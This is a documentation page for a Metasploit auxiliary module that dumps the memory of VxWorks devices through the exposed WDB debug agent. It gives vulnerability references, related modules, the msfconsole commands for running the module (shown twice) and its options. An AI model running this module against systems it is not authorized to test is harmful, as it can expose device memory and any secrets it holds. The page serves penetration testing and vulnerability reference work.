VxWorks WDB Agent Remote Memory Dump
This module provides the ability to dump the system memory of a VxWorks target through WDBRPC
Rank
- Normal
Authors
- hdm < hdm [at] metasploit.com >
Vulnerability References
- OSVDB-66842
- http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html
- http://www.kb.cert.org/vuls/id/362332
Development
Similar Modules
- auxiliary/admin/vxworks/apple_airport_extreme_password
- auxiliary/admin/vxworks/dlink_i2eye_autoanswer
- auxiliary/admin/vxworks/wdbrpc_reboot
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/admin/vxworks/wdbrpc_memory_dump
msf auxiliary(wdbrpc_memory_dump) > set RHOST [TARGET IP]
msf auxiliary(wdbrpc_memory_dump) > run
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/admin/vxworks/wdbrpc_memory_dump
msf auxiliary(wdbrpc_memory_dump) > set RHOST [TARGET IP]
msf auxiliary(wdbrpc_memory_dump) > run
Module Options
| LPATH | The local filename to store the dumped memory (default: /home/svn/.msf4/logs/vxworks_memory.dmp) |
| OFFSET | The starting offset to read the memory dump (hex allowed) (default: 0) |
| RHOST | The target address |
| RPORT | The target port (default: 17185) |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |